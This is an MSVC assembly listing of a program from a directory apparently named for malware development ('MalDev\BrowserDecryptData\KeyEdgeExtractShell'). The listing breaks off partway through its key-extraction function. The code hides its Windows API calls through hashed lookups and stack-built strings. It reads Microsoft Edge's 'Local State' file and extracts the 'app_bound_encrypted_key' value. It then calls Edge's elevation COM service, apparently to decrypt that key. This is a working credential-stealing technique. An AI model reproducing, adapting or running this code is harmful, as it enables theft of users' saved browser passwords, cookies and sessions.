; Listing generated by Microsoft (R) Optimizing Compiler Version 19.50.35728.0 

include listing.inc

INCLUDELIB LIBCMT
INCLUDELIB OLDNAMES

PUBLIC	?DecryptKey@@YAXXZ				; DecryptKey
PUBLIC	main
EXTRN	?Base64Decode@@YAPEADPEBDAEAH@Z:PROC		; Base64Decode
EXTRN	??0ApiResolve@@QEAA@XZ:PROC			; ApiResolve::ApiResolve
EXTRN	??1ApiResolve@@QEAA@XZ:PROC			; ApiResolve::~ApiResolve
EXTRN	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z:PROC ; ApiResolve::GetModuleBaseAddress
EXTRN	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z:PROC	; ApiResolve::GetApiAddress
EXTRN	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z:PROC	; FindPatternA
EXTRN	?CopyStringA@@YA_NPEBDPEAD_K@Z:PROC		; CopyStringA
EXTRN	?StrLen@@YA_KPEAD@Z:PROC			; StrLen
EXTRN	?AllocMemory@@YA_N_KPEAPEAX@Z:PROC		; AllocMemory
; Function compile flags: /Odtp
_TEXT	SEGMENT
main	PROC
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\main.cpp
; Line 296
$LN3:
	sub	rsp, 40					; 00000028H
; Line 297
	call	?DecryptKey@@YAXXZ			; DecryptKey
	npad	1
; Line 298
	xor	eax, eax
	add	rsp, 40					; 00000028H
	ret	0
main	ENDP
_TEXT	ENDS
; Function compile flags: /Odtp
_TEXT	SEGMENT
apiResolve$ = 64
i$1 = 72
hr$ = 76
patternKey$ = 80
sOle32$ = 112
sUser32$ = 128
sShell32$ = 144
sOleAut32$ = 160
sLocalState$ = 176
path$2 = 216
dwFileSize$ = 264
lpKernel32$ = 272
keyPointer$ = 280
sizeKeyB64$ = 288
length$ = 292
pLoadLibraryA$ = 296
EdgeIID$ = 304
EdgeCLSID$ = 320
hOle32$ = 336
hOleAut32$ = 344
pElevatorEdge$ = 352
decryptedDataBSTR$ = 360
hFile$ = 368
dwLastError$ = 376
tv739 = 380
fileBuf$ = 384
pCloseHandle$ = 392
pSysFreeString$ = 400
pCreateFileA$ = 408
bstrEncKey$ = 416
pCoSetProxyBlanket$ = 424
pCoCreateInstance$ = 432
pCoUninitialize$ = 440
pReadFile$ = 448
pSysAllocStringByteLen$ = 456
pWriteFile$3 = 464
pSysStringByteLen$ = 472
hFile$4 = 480
pGetFileSize$ = 488
pSHGetFolderPathA$ = 496
pCoInitializeEx$ = 504
hashSysFreeString$ = 512
hashWriteFile$5 = 516
size$ = 520
hashKernel32$ = 524
hashLoadLibraryA$ = 528
hashSHGetFolderPathA$ = 532
hashCreateFileA$ = 536
tv79 = 544
tv83 = 552
tv87 = 560
hShell32$ = 568
tv232 = 576
tv250 = 584
tv248 = 592
tv360 = 600
tv371 = 608
tv392 = 616
tv402 = 624
tv412 = 632
tv410 = 640
tv502 = 648
tv521 = 656
tv538 = 664
tv577 = 672
encKey$ = 680
tv600 = 688
tv609 = 696
tv613 = 704
tv629 = 712
tv636 = 720
tv737 = 728
tv741 = 736
tv743 = 744
tv747 = 752
hashGetFileSize$ = 760
hashReadFile$ = 764
hashCloseHandle$ = 768
hashCoInitializeEx$ = 772
hashCoUninitialize$ = 776
hashCoCreateInstance$ = 780
hashCoSetProxyBlanket$ = 784
hashSysAllocStringByteLen$ = 788
hashSysStringByteLen$ = 792
hUser32$ = 800
path$ = 816
?DecryptKey@@YAXXZ PROC					; DecryptKey
; File C:\Users\admin\Documents\GitHub\MalDev\BrowserDecryptData\KeyEdgeExtractShell\main.cpp
; Line 63
$LN34:
	push	rdi
	sub	rsp, 1088				; 00000440H
; Line 64
	mov	DWORD PTR EdgeCLSID$[rsp], 533457260	; 1fcbe96cH
	mov	eax, 5783				; 00001697H
	mov	WORD PTR EdgeCLSID$[rsp+4], ax
	mov	eax, 17327				; 000043afH
	mov	WORD PTR EdgeCLSID$[rsp+6], ax
	mov	BYTE PTR EdgeCLSID$[rsp+8], 145		; 00000091H
	mov	BYTE PTR EdgeCLSID$[rsp+9], 64		; 00000040H
	mov	BYTE PTR EdgeCLSID$[rsp+10], 40		; 00000028H
	mov	BYTE PTR EdgeCLSID$[rsp+11], 151	; 00000097H
	mov	BYTE PTR EdgeCLSID$[rsp+12], 199	; 000000c7H
	mov	BYTE PTR EdgeCLSID$[rsp+13], 198	; 000000c6H
	mov	BYTE PTR EdgeCLSID$[rsp+14], 151	; 00000097H
	mov	BYTE PTR EdgeCLSID$[rsp+15], 103	; 00000067H
; Line 65
	mov	DWORD PTR EdgeIID$[rsp], -909985785	; c9c2b807H
	mov	eax, 30513				; 00007731H
	mov	WORD PTR EdgeIID$[rsp+4], ax
	mov	eax, 20276				; 00004f34H
	mov	WORD PTR EdgeIID$[rsp+6], ax
	mov	BYTE PTR EdgeIID$[rsp+8], 129		; 00000081H
	mov	BYTE PTR EdgeIID$[rsp+9], 183		; 000000b7H
	mov	BYTE PTR EdgeIID$[rsp+10], 68		; 00000044H
	mov	BYTE PTR EdgeIID$[rsp+11], 255		; 000000ffH
	mov	BYTE PTR EdgeIID$[rsp+12], 119		; 00000077H
	mov	BYTE PTR EdgeIID$[rsp+13], 121		; 00000079H
	mov	BYTE PTR EdgeIID$[rsp+14], 82		; 00000052H
	mov	BYTE PTR EdgeIID$[rsp+15], 43		; 0000002bH
; Line 66
	mov	QWORD PTR pElevatorEdge$[rsp], 0
; Line 69
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??0ApiResolve@@QEAA@XZ			; ApiResolve::ApiResolve
; Line 70
	mov	DWORD PTR hashKernel32$[rsp], 764661557	; 2d93cf35H
; Line 71
	mov	edx, 764661557				; 2d93cf35H
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetModuleBaseAddress@ApiResolve@@QEAAPEAXI@Z ; ApiResolve::GetModuleBaseAddress
	mov	QWORD PTR lpKernel32$[rsp], rax
; Line 72
	cmp	QWORD PTR lpKernel32$[rsp], 0
	jne	SHORT $LN5@DecryptKey
; Line 73
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN5@DecryptKey:
; Line 77
	mov	DWORD PTR hashLoadLibraryA$[rsp], -462133483 ; e4746715H
; Line 78
	mov	r8d, -462133483				; e4746715H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pLoadLibraryA$[rsp], rax
; Line 79
	cmp	QWORD PTR pLoadLibraryA$[rsp], 0
	jne	SHORT $LN6@DecryptKey
; Line 80
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN6@DecryptKey:
; Line 83
	mov	BYTE PTR sOle32$[rsp], 79		; 0000004fH
	mov	BYTE PTR sOle32$[rsp+1], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sOle32$[rsp+3], 51		; 00000033H
	mov	BYTE PTR sOle32$[rsp+4], 50		; 00000032H
	mov	BYTE PTR sOle32$[rsp+5], 46		; 0000002eH
	mov	BYTE PTR sOle32$[rsp+6], 100		; 00000064H
	mov	BYTE PTR sOle32$[rsp+7], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+8], 108		; 0000006cH
	mov	BYTE PTR sOle32$[rsp+9], 0
; Line 84
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv79[rsp], rax
	lea	rcx, QWORD PTR sOle32$[rsp]
	call	QWORD PTR tv79[rsp]
	mov	QWORD PTR hOle32$[rsp], rax
; Line 86
	mov	BYTE PTR sUser32$[rsp], 117		; 00000075H
	mov	BYTE PTR sUser32$[rsp+1], 115		; 00000073H
	mov	BYTE PTR sUser32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sUser32$[rsp+3], 114		; 00000072H
	mov	BYTE PTR sUser32$[rsp+4], 51		; 00000033H
	mov	BYTE PTR sUser32$[rsp+5], 50		; 00000032H
	mov	BYTE PTR sUser32$[rsp+6], 46		; 0000002eH
	mov	BYTE PTR sUser32$[rsp+7], 100		; 00000064H
	mov	BYTE PTR sUser32$[rsp+8], 108		; 0000006cH
	mov	BYTE PTR sUser32$[rsp+9], 108		; 0000006cH
	mov	BYTE PTR sUser32$[rsp+10], 0
; Line 87
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv83[rsp], rax
	lea	rcx, QWORD PTR sUser32$[rsp]
	call	QWORD PTR tv83[rsp]
	mov	QWORD PTR hUser32$[rsp], rax
; Line 89
	mov	BYTE PTR sShell32$[rsp], 83		; 00000053H
	mov	BYTE PTR sShell32$[rsp+1], 104		; 00000068H
	mov	BYTE PTR sShell32$[rsp+2], 101		; 00000065H
	mov	BYTE PTR sShell32$[rsp+3], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+4], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+5], 51		; 00000033H
	mov	BYTE PTR sShell32$[rsp+6], 50		; 00000032H
	mov	BYTE PTR sShell32$[rsp+7], 46		; 0000002eH
	mov	BYTE PTR sShell32$[rsp+8], 100		; 00000064H
	mov	BYTE PTR sShell32$[rsp+9], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+10], 108		; 0000006cH
	mov	BYTE PTR sShell32$[rsp+11], 0
; Line 90
	mov	rax, QWORD PTR pLoadLibraryA$[rsp]
	mov	QWORD PTR tv87[rsp], rax
	lea	rcx, QWORD PTR sShell32$[rsp]
	call	QWORD PTR tv87[rsp]
	mov	QWORD PTR hShell32$[rsp], rax
; Line 98
	mov	DWORD PTR hashSHGetFolderPathA$[rsp], -1368526292 ; ae6df22cH
; Line 99
	mov	r8d, -1368526292			; ae6df22cH
	mov	rdx, QWORD PTR hShell32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pSHGetFolderPathA$[rsp], rax
; Line 100
	cmp	QWORD PTR pSHGetFolderPathA$[rsp], 0
	jne	SHORT $LN7@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN7@DecryptKey:
; Line 101
	lea	rax, QWORD PTR path$[rsp]
	mov	rdi, rax
	xor	eax, eax
	mov	ecx, 260				; 00000104H
	rep stosb
; Line 102
	mov	rax, QWORD PTR pSHGetFolderPathA$[rsp]
	mov	QWORD PTR tv232[rsp], rax
	lea	rax, QWORD PTR path$[rsp]
	mov	QWORD PTR [rsp+32], rax
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, 28
	xor	ecx, ecx
	call	QWORD PTR tv232[rsp]
	test	eax, eax
	je	SHORT $LN8@DecryptKey
; Line 103
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN8@DecryptKey:
; Line 107
	mov	BYTE PTR sLocalState$[rsp], 92		; 0000005cH
	mov	BYTE PTR sLocalState$[rsp+1], 77	; 0000004dH
	mov	BYTE PTR sLocalState$[rsp+2], 105	; 00000069H
	mov	BYTE PTR sLocalState$[rsp+3], 99	; 00000063H
	mov	BYTE PTR sLocalState$[rsp+4], 114	; 00000072H
	mov	BYTE PTR sLocalState$[rsp+5], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+6], 115	; 00000073H
	mov	BYTE PTR sLocalState$[rsp+7], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+8], 102	; 00000066H
	mov	BYTE PTR sLocalState$[rsp+9], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+10], 92	; 0000005cH
; Line 108
	mov	BYTE PTR sLocalState$[rsp+11], 69	; 00000045H
	mov	BYTE PTR sLocalState$[rsp+12], 100	; 00000064H
	mov	BYTE PTR sLocalState$[rsp+13], 103	; 00000067H
	mov	BYTE PTR sLocalState$[rsp+14], 101	; 00000065H
	mov	BYTE PTR sLocalState$[rsp+15], 92	; 0000005cH
; Line 109
	mov	BYTE PTR sLocalState$[rsp+16], 85	; 00000055H
	mov	BYTE PTR sLocalState$[rsp+17], 115	; 00000073H
	mov	BYTE PTR sLocalState$[rsp+18], 101	; 00000065H
	mov	BYTE PTR sLocalState$[rsp+19], 114	; 00000072H
	mov	BYTE PTR sLocalState$[rsp+20], 32	; 00000020H
	mov	BYTE PTR sLocalState$[rsp+21], 68	; 00000044H
	mov	BYTE PTR sLocalState$[rsp+22], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+23], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+24], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+25], 92	; 0000005cH
; Line 110
	mov	BYTE PTR sLocalState$[rsp+26], 76	; 0000004cH
	mov	BYTE PTR sLocalState$[rsp+27], 111	; 0000006fH
	mov	BYTE PTR sLocalState$[rsp+28], 99	; 00000063H
	mov	BYTE PTR sLocalState$[rsp+29], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+30], 108	; 0000006cH
	mov	BYTE PTR sLocalState$[rsp+31], 32	; 00000020H
	mov	BYTE PTR sLocalState$[rsp+32], 83	; 00000053H
	mov	BYTE PTR sLocalState$[rsp+33], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+34], 97	; 00000061H
	mov	BYTE PTR sLocalState$[rsp+35], 116	; 00000074H
	mov	BYTE PTR sLocalState$[rsp+36], 101	; 00000065H
; Line 111
	mov	BYTE PTR sLocalState$[rsp+37], 0
; Line 113
	lea	rcx, QWORD PTR path$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	DWORD PTR size$[rsp], eax
; Line 114
	lea	rcx, QWORD PTR sLocalState$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	ecx, 260				; 00000104H
	sub	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR tv250[rsp], rax
	lea	rcx, QWORD PTR path$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	lea	rax, QWORD PTR path$[rsp+rax]
	mov	QWORD PTR tv248[rsp], rax
	mov	r8, QWORD PTR tv250[rsp]
	mov	rdx, QWORD PTR tv248[rsp]
	lea	rcx, QWORD PTR sLocalState$[rsp]
	call	?CopyStringA@@YA_NPEBDPEAD_K@Z		; CopyStringA
; Line 125
	mov	DWORD PTR hashCreateFileA$[rsp], 896765632 ; 35738ec0H
; Line 126
	mov	r8d, 896765632				; 35738ec0H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCreateFileA$[rsp], rax
; Line 127
	cmp	QWORD PTR pCreateFileA$[rsp], 0
	jne	SHORT $LN9@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN9@DecryptKey:
; Line 128
	mov	rax, QWORD PTR pCreateFileA$[rsp]
	mov	QWORD PTR tv360[rsp], rax
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 128			; 00000080H
	mov	DWORD PTR [rsp+32], 3
	xor	r9d, r9d
	xor	r8d, r8d
	mov	edx, -2147483648			; 80000000H
	lea	rcx, QWORD PTR path$[rsp]
	call	QWORD PTR tv360[rsp]
	mov	QWORD PTR hFile$[rsp], rax
; Line 129
	cmp	QWORD PTR hFile$[rsp], 0
	jne	SHORT $LN10@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN10@DecryptKey:
; Line 132
	mov	DWORD PTR hashGetFileSize$[rsp], -1940020856 ; 8c5da188H
; Line 133
	mov	r8d, -1940020856			; 8c5da188H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pGetFileSize$[rsp], rax
; Line 134
	cmp	QWORD PTR pGetFileSize$[rsp], 0
	jne	SHORT $LN11@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN11@DecryptKey:
; Line 135
	mov	rax, QWORD PTR pGetFileSize$[rsp]
	mov	QWORD PTR tv371[rsp], rax
	xor	edx, edx
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv371[rsp]
	mov	DWORD PTR dwFileSize$[rsp], eax
; Line 136
	cmp	DWORD PTR dwFileSize$[rsp], 0
	jne	SHORT $LN12@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN12@DecryptKey:
; Line 138
	mov	QWORD PTR fileBuf$[rsp], 0
; Line 139
	mov	eax, DWORD PTR dwFileSize$[rsp]
	inc	eax
	mov	eax, eax
	lea	rdx, QWORD PTR fileBuf$[rsp]
	mov	ecx, eax
	call	?AllocMemory@@YA_N_KPEAPEAX@Z		; AllocMemory
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN13@DecryptKey
; Line 140
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN13@DecryptKey:
; Line 150
	mov	DWORD PTR hashReadFile$[rsp], -1576683562 ; a205b7d6H
; Line 151
	mov	r8d, -1576683562			; a205b7d6H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pReadFile$[rsp], rax
; Line 152
	cmp	QWORD PTR pReadFile$[rsp], 0
	jne	SHORT $LN14@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN14@DecryptKey:
; Line 153
	mov	rax, QWORD PTR pReadFile$[rsp]
	mov	QWORD PTR tv392[rsp], rax
	mov	QWORD PTR [rsp+32], 0
	xor	r9d, r9d
	mov	r8d, DWORD PTR dwFileSize$[rsp]
	mov	rdx, QWORD PTR fileBuf$[rsp]
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv392[rsp]
	test	eax, eax
	jne	SHORT $LN15@DecryptKey
; Line 154
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN15@DecryptKey:
; Line 158
	mov	DWORD PTR hashCloseHandle$[rsp], 1729908677 ; 671c4fc5H
; Line 159
	mov	r8d, 1729908677				; 671c4fc5H
	mov	rdx, QWORD PTR lpKernel32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCloseHandle$[rsp], rax
; Line 160
	cmp	QWORD PTR pCloseHandle$[rsp], 0
	jne	SHORT $LN16@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN16@DecryptKey:
; Line 162
	mov	rax, QWORD PTR pCloseHandle$[rsp]
	mov	QWORD PTR tv402[rsp], rax
	mov	rcx, QWORD PTR hFile$[rsp]
	call	QWORD PTR tv402[rsp]
; Line 164
	mov	BYTE PTR patternKey$[rsp], 97		; 00000061H
	mov	BYTE PTR patternKey$[rsp+1], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+2], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+3], 95		; 0000005fH
	mov	BYTE PTR patternKey$[rsp+4], 98		; 00000062H
	mov	BYTE PTR patternKey$[rsp+5], 111	; 0000006fH
	mov	BYTE PTR patternKey$[rsp+6], 117	; 00000075H
	mov	BYTE PTR patternKey$[rsp+7], 110	; 0000006eH
	mov	BYTE PTR patternKey$[rsp+8], 100	; 00000064H
	mov	BYTE PTR patternKey$[rsp+9], 95		; 0000005fH
	mov	BYTE PTR patternKey$[rsp+10], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+11], 110	; 0000006eH
	mov	BYTE PTR patternKey$[rsp+12], 99	; 00000063H
	mov	BYTE PTR patternKey$[rsp+13], 114	; 00000072H
	mov	BYTE PTR patternKey$[rsp+14], 121	; 00000079H
	mov	BYTE PTR patternKey$[rsp+15], 112	; 00000070H
	mov	BYTE PTR patternKey$[rsp+16], 116	; 00000074H
	mov	BYTE PTR patternKey$[rsp+17], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+18], 100	; 00000064H
	mov	BYTE PTR patternKey$[rsp+19], 95	; 0000005fH
	mov	BYTE PTR patternKey$[rsp+20], 107	; 0000006bH
	mov	BYTE PTR patternKey$[rsp+21], 101	; 00000065H
	mov	BYTE PTR patternKey$[rsp+22], 121	; 00000079H
	mov	BYTE PTR patternKey$[rsp+23], 34	; 00000022H
	mov	BYTE PTR patternKey$[rsp+24], 58	; 0000003aH
	mov	BYTE PTR patternKey$[rsp+25], 34	; 00000022H
	mov	BYTE PTR patternKey$[rsp+26], 0
; Line 165
	mov	QWORD PTR keyPointer$[rsp], 0
; Line 166
	lea	rcx, QWORD PTR patternKey$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	QWORD PTR tv412[rsp], rax
	mov	rax, QWORD PTR fileBuf$[rsp]
	mov	QWORD PTR tv410[rsp], rax
	lea	r9, QWORD PTR keyPointer$[rsp]
	mov	r8, QWORD PTR tv412[rsp]
	lea	rdx, QWORD PTR patternKey$[rsp]
	mov	rcx, QWORD PTR tv410[rsp]
	call	?FindPatternA@@YA_NPEBD0_KPEAPEAD@Z	; FindPatternA
	movzx	eax, al
	test	eax, eax
	jne	SHORT $LN17@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN17@DecryptKey:
; Line 167
	lea	rcx, QWORD PTR patternKey$[rsp]
	call	?StrLen@@YA_KPEAD@Z			; StrLen
	mov	rcx, QWORD PTR keyPointer$[rsp]
	add	rcx, rax
	mov	rax, rcx
	mov	QWORD PTR keyPointer$[rsp], rax
; Line 168
	mov	DWORD PTR sizeKeyB64$[rsp], 0
; Line 169
	mov	DWORD PTR i$1[rsp], 0
	jmp	SHORT $LN4@DecryptKey
$LN2@DecryptKey:
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
$LN4@DecryptKey:
; Line 170
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR keyPointer$[rsp]
	movsx	eax, BYTE PTR [rcx+rax]
	cmp	eax, 34					; 00000022H
	jne	SHORT $LN18@DecryptKey
; Line 171
	movsxd	rax, DWORD PTR i$1[rsp]
	mov	rcx, QWORD PTR keyPointer$[rsp]
	mov	BYTE PTR [rcx+rax], 0
; Line 172
	jmp	SHORT $LN3@DecryptKey
$LN18@DecryptKey:
; Line 174
	mov	eax, DWORD PTR i$1[rsp]
	inc	eax
	mov	DWORD PTR i$1[rsp], eax
; Line 175
	mov	eax, DWORD PTR sizeKeyB64$[rsp]
	inc	eax
	mov	DWORD PTR sizeKeyB64$[rsp], eax
; Line 176
	jmp	SHORT $LN2@DecryptKey
$LN3@DecryptKey:
; Line 183
	mov	DWORD PTR hashCoInitializeEx$[rsp], -731484482 ; d4666ebeH
; Line 184
	mov	r8d, -731484482				; d4666ebeH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoInitializeEx$[rsp], rax
; Line 185
	cmp	QWORD PTR pCoInitializeEx$[rsp], 0
	jne	SHORT $LN19@DecryptKey
; Line 186
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN19@DecryptKey:
; Line 189
	mov	rax, QWORD PTR pCoInitializeEx$[rsp]
	mov	QWORD PTR tv502[rsp], rax
	mov	edx, 2
	xor	ecx, ecx
	call	QWORD PTR tv502[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 190
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN20@DecryptKey
; Line 191
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN20@DecryptKey:
; Line 195
	mov	DWORD PTR hashCoUninitialize$[rsp], 691362315 ; 29355a0bH
; Line 196
	mov	r8d, 691362315				; 29355a0bH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoUninitialize$[rsp], rax
; Line 197
	cmp	QWORD PTR pCoUninitialize$[rsp], 0
	jne	SHORT $LN21@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN21@DecryptKey:
; Line 204
	mov	DWORD PTR hashCoCreateInstance$[rsp], -1213256403 ; b7af2d2dH
; Line 205
	mov	r8d, -1213256403			; b7af2d2dH
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoCreateInstance$[rsp], rax
; Line 206
	cmp	QWORD PTR pCoCreateInstance$[rsp], 0
	jne	SHORT $LN22@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN22@DecryptKey:
; Line 207
	mov	rax, QWORD PTR pCoCreateInstance$[rsp]
	mov	QWORD PTR tv521[rsp], rax
	lea	rax, QWORD PTR pElevatorEdge$[rsp]
	mov	QWORD PTR [rsp+32], rax
	lea	r9, QWORD PTR EdgeIID$[rsp]
	mov	r8d, 4
	xor	edx, edx
	lea	rcx, QWORD PTR EdgeCLSID$[rsp]
	call	QWORD PTR tv521[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 215
	cmp	DWORD PTR hr$[rsp], 0
	jge	SHORT $LN23@DecryptKey
; Line 216
	call	QWORD PTR pCoUninitialize$[rsp]
; Line 217
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN23@DecryptKey:
; Line 231
	mov	DWORD PTR hashCoSetProxyBlanket$[rsp], 1618607058 ; 6079fbd2H
; Line 232
	mov	r8d, 1618607058				; 6079fbd2H
	mov	rdx, QWORD PTR hOle32$[rsp]
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	?GetApiAddress@ApiResolve@@QEAAPEAXPEAXI@Z ; ApiResolve::GetApiAddress
	mov	QWORD PTR pCoSetProxyBlanket$[rsp], rax
; Line 233
	cmp	QWORD PTR pCoSetProxyBlanket$[rsp], 0
	jne	SHORT $LN24@DecryptKey
	lea	rcx, QWORD PTR apiResolve$[rsp]
	call	??1ApiResolve@@QEAA@XZ			; ApiResolve::~ApiResolve
	npad	1
	jmp	$LN1@DecryptKey
$LN24@DecryptKey:
; Line 234
	mov	rax, QWORD PTR pCoSetProxyBlanket$[rsp]
	mov	QWORD PTR tv538[rsp], rax
	mov	DWORD PTR [rsp+56], 64			; 00000040H
	mov	QWORD PTR [rsp+48], 0
	mov	DWORD PTR [rsp+40], 3
	mov	DWORD PTR [rsp+32], 6
	mov	r9, -1
	mov	r8d, -1					; ffffffffH
	mov	edx, -1					; ffffffffH
	mov	rcx, QWORD PTR pElevatorEdge$[rsp]
	call	QWORD PTR tv538[rsp]
	mov	DWORD PTR hr$[rsp], eax
; Line 245
	mov	QWORD PTR decryptedDataBSTR$[rsp], 0
; Line 246
	mov	DWORD PTR dwLastError$[rsp], 0
; Line 247
	mov	DWORD PTR length$[rsp], 0
; Line 248
	lea	rdx, QWORD PTR length$[rsp]
